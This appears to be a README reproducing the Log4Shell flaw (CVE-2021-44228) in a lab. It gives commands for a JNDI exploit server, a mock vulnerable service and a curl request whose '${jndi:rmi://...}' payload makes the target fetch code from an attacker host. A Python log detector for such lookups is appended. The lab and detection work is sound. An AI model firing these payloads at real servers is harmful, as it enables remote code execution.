cve-2021-44228-log4j
Quickstart
Concept
- Attacker Server IP: 172.18.5.189
- PRD Server IP: 172.18.5.191
Step 1: Start LDAP/RMI services. [On Attacker Server]
Download Jar: JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
Start Services.
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A "172.18.5.189" -C "touch /tmp/cve-2021-44228-log4j"
Output:
Step 2: Mock a PRD service. [On PRD Server]
Download Jar: log4jRCE-0.0.1-SNAPSHOT.jar
Run Services.
java -jar log4jRCE-0.0.1-SNAPSHOT.jar
The service runs on port 8080. It logs whatever is sent to the /login API.
Step 3: Make a request to the PRD service. [Any Server]
curl -X POST 'http://172.18.5.191:8080/login' --data-urlencode 'data=${jndi:rmi://172.18.5.189:1099/spring}'
Result:
The temp file has been created.
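A defender-side check for the request in Step 3, added here as an example and not part of this repository: it scans log lines for the `${jndi:...}` lookup, including the percent-encoded form that `curl --data-urlencode` puts on the wire, and reports the callback scheme, host and port. The log line format and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Direct lookup form from Step 3: ${jndi:<scheme>://<host>[:<port>]/<path>}
# Nested or obfuscated lookups are out of scope for this sketch.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)

def decode(value, max_passes=3):
    """Percent-decode until stable; bodies may be logged raw, encoded or double-encoded."""
    for _ in range(max_passes):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_jndi_lookups(line):
    """Return one dict per JNDI lookup found in a single log line."""
    hits = []
    for m in JNDI_RE.finditer(decode(line)):
        hits.append({
            "scheme": m.group("scheme").lower(),
            "host": m.group("host"),
            "port": int(m.group("port")) if m.group("port") else None,
            "path": m.group("path") or "",
        })
    return hits

def scan(lines):
    """Return (line_number, hit) pairs; line numbers start at 1."""
    return [(n, hit) for n, line in enumerate(lines, 1) for hit in find_jndi_lookups(line)]

# Constructed sample lines (format is an assumption, not the mock service's real output).
SAMPLE_LOG = [
    "2021-12-10 10:00:01 POST /login data=alice",
    "2021-12-10 10:00:02 POST /login data=%24%7Bjndi%3Armi%3A%2F%2F172.18.5.189%3A1099%2Fspring%7D",
    "2021-12-10 10:00:03 INFO login data=${jndi:rmi://172.18.5.189:1099/spring}",
    "2021-12-10 10:00:04 POST /login data=%2524%257Bjndi%253Aldap%253A%252F%252F172.18.5.189%252Fa%257D",
]

if __name__ == "__main__":
    for n, hit in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup to {hit['scheme']}://{hit['host']}:{hit['port']}{hit['path']}")
```

The extracted host and port can be matched against egress firewall or DNS logs to see whether the logging server actually attempted the outbound connection.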